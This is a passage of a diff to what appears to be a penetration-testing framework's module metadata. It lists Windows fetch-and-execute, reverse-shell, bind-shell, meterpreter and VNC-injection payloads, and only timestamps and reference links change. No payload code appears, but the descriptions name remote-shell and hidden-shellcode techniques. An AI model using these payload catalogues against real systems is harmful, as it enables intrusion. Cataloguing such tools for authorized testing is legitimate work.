    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/meterpreter/reverse_https",
@@ -189935,7 +191121,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/meterpreter/reverse_named_pipe",
@@ -189979,7 +191165,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/meterpreter/reverse_tcp",
@@ -190027,7 +191213,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/meterpreter/reverse_tcp_rc4",
@@ -190071,7 +191257,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/meterpreter/reverse_tcp_uuid",
@@ -190115,7 +191301,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/meterpreter/reverse_winhttp",
@@ -190159,7 +191345,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/meterpreter/reverse_winhttps",
@@ -190203,7 +191389,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/meterpreter_bind_named_pipe",
@@ -190244,7 +191430,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/meterpreter_bind_tcp",
@@ -190285,7 +191471,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/meterpreter_reverse_http",
@@ -190326,7 +191512,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/meterpreter_reverse_https",
@@ -190367,7 +191553,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/meterpreter_reverse_ipv6_tcp",
@@ -190408,7 +191594,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/meterpreter_reverse_tcp",
@@ -190440,7 +191626,7 @@
    ],
    "description": "Fetch and Execute an x64 payload from an http server.\n\nListen for an IPv6 connection (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -190448,7 +191634,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/peinject/bind_ipv6_tcp",
@@ -190483,7 +191669,7 @@
    ],
    "description": "Fetch and Execute an x64 payload from an http server.\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -190491,7 +191677,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/peinject/bind_ipv6_tcp_uuid",
@@ -190525,7 +191711,7 @@
    ],
    "description": "Fetch and Execute an x64 payload from an http server.\n\nListen for a pipe connection (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -190533,7 +191719,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/peinject/bind_named_pipe",
@@ -190567,7 +191753,7 @@
    ],
    "description": "Fetch and Execute an x64 payload from an http server.\n\nListen for a connection (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -190575,7 +191761,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/peinject/bind_tcp",
@@ -190614,7 +191800,7 @@
    ],
    "description": "Fetch and Execute an x64 payload from an http server.\n\nConnect back to the attacker",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -190622,7 +191808,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/peinject/bind_tcp_rc4",
@@ -190657,7 +191843,7 @@
    ],
    "description": "Fetch and Execute an x64 payload from an http server.\n\nListen for a connection with UUID Support (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -190665,7 +191851,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/peinject/bind_tcp_uuid",
@@ -190699,7 +191885,7 @@
    ],
    "description": "Fetch and Execute an x64 payload from an http server.\n\nConnect back to the attacker via a named pipe pivot",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -190707,7 +191893,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/peinject/reverse_named_pipe",
@@ -190741,7 +191927,7 @@
    ],
    "description": "Fetch and Execute an x64 payload from an http server.\n\nConnect back to the attacker (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -190749,7 +191935,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/peinject/reverse_tcp",
@@ -190788,7 +191974,7 @@
    ],
    "description": "Fetch and Execute an x64 payload from an http server.\n\nConnect back to the attacker",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -190796,7 +191982,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/peinject/reverse_tcp_rc4",
@@ -190831,7 +192017,7 @@
    ],
    "description": "Fetch and Execute an x64 payload from an http server.\n\nConnect back to the attacker with UUID Support (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -190839,7 +192025,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/peinject/reverse_tcp_uuid",
@@ -190880,7 +192066,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/pingback_reverse_tcp",
@@ -190921,7 +192107,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/powershell_bind_tcp",
@@ -190962,7 +192148,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/powershell_reverse_tcp",
@@ -191003,7 +192189,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/powershell_reverse_tcp_ssl",
@@ -191042,7 +192228,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/shell/bind_ipv6_tcp",
@@ -191084,7 +192270,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/shell/bind_ipv6_tcp_uuid",
@@ -191126,7 +192312,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/shell/bind_named_pipe",
@@ -191167,7 +192353,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/shell/bind_tcp",
@@ -191213,7 +192399,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/shell/bind_tcp_rc4",
@@ -191255,7 +192441,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/shell/bind_tcp_uuid",
@@ -191296,7 +192482,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/shell/reverse_tcp",
@@ -191342,7 +192528,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/shell/reverse_tcp_rc4",
@@ -191384,7 +192570,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/shell/reverse_tcp_uuid",
@@ -191425,7 +192611,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/shell_bind_tcp",
@@ -191464,7 +192650,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/shell_reverse_tcp",
@@ -191504,7 +192690,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/vncinject/bind_ipv6_tcp",
@@ -191547,7 +192733,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/vncinject/bind_ipv6_tcp_uuid",
@@ -191590,7 +192776,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/vncinject/bind_named_pipe",
@@ -191632,7 +192818,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/vncinject/bind_tcp",
@@ -191679,7 +192865,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/vncinject/bind_tcp_rc4",
@@ -191722,7 +192908,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/vncinject/bind_tcp_uuid",
@@ -191765,7 +192951,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/vncinject/reverse_http",
@@ -191810,7 +192996,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/vncinject/reverse_https",
@@ -191852,7 +193038,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/vncinject/reverse_tcp",
@@ -191899,7 +193085,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/vncinject/reverse_tcp_rc4",
@@ -191942,7 +193128,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/vncinject/reverse_tcp_uuid",
@@ -191985,7 +193171,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/vncinject/reverse_winhttp",
@@ -192028,7 +193214,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/vncinject/reverse_winhttps",
@@ -193740,7 +194926,7 @@
    ],
    "description": "Fetch and Execute an x64 payload from an https server.\n\nListen for an IPv6 connection (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -193783,7 +194969,7 @@
    ],
    "description": "Fetch and Execute an x64 payload from an https server.\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -193825,7 +195011,7 @@
    ],
    "description": "Fetch and Execute an x64 payload from an https server.\n\nListen for a pipe connection (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -193867,7 +195053,7 @@
    ],
    "description": "Fetch and Execute an x64 payload from an https server.\n\nListen for a connection (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -193914,7 +195100,7 @@
    ],
    "description": "Fetch and Execute an x64 payload from an https server.\n\nConnect back to the attacker",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -193957,7 +195143,7 @@
    ],
    "description": "Fetch and Execute an x64 payload from an https server.\n\nListen for a connection with UUID Support (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -193999,7 +195185,7 @@
    ],
    "description": "Fetch and Execute an x64 payload from an https server.\n\nConnect back to the attacker via a named pipe pivot",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -194041,7 +195227,7 @@
    ],
    "description": "Fetch and Execute an x64 payload from an https server.\n\nConnect back to the attacker (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -194088,7 +195274,7 @@
    ],
    "description": "Fetch and Execute an x64 payload from an https server.\n\nConnect back to the attacker",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -194131,7 +195317,7 @@
    ],
    "description": "Fetch and Execute an x64 payload from an https server.\n\nConnect back to the attacker with UUID Support (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -195446,7 +196632,7 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [
-
+      "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -195491,7 +196677,7 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [
-
+      "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -196664,7 +197850,8 @@
    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
-      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
+      "URL-https://github.com/rapid7/ReflectiveDLLInjection",
+      "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -196709,7 +197896,8 @@
    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
-      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
+      "URL-https://github.com/rapid7/ReflectiveDLLInjection",
+      "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -198001,7 +199189,8 @@
    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
-      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
+      "URL-https://github.com/rapid7/ReflectiveDLLInjection",
+      "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -198047,7 +199236,8 @@
    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
-      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
+      "URL-https://github.com/rapid7/ReflectiveDLLInjection",
+      "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -199306,7 +200496,7 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [
-
+      "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -199351,7 +200541,7 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [
-
+      "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -200146,7 +201336,7 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [
-
+      "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -200191,7 +201381,7 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [
-
+      "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -200986,7 +202176,8 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber",
+      "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -201031,7 +202222,8 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber",
+      "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -201075,7 +202267,7 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection (Windows x86)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -201120,7 +202312,7 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection with UUID Support (Windows x86)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -201162,7 +202354,7 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a pipe connection (Windows x86)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
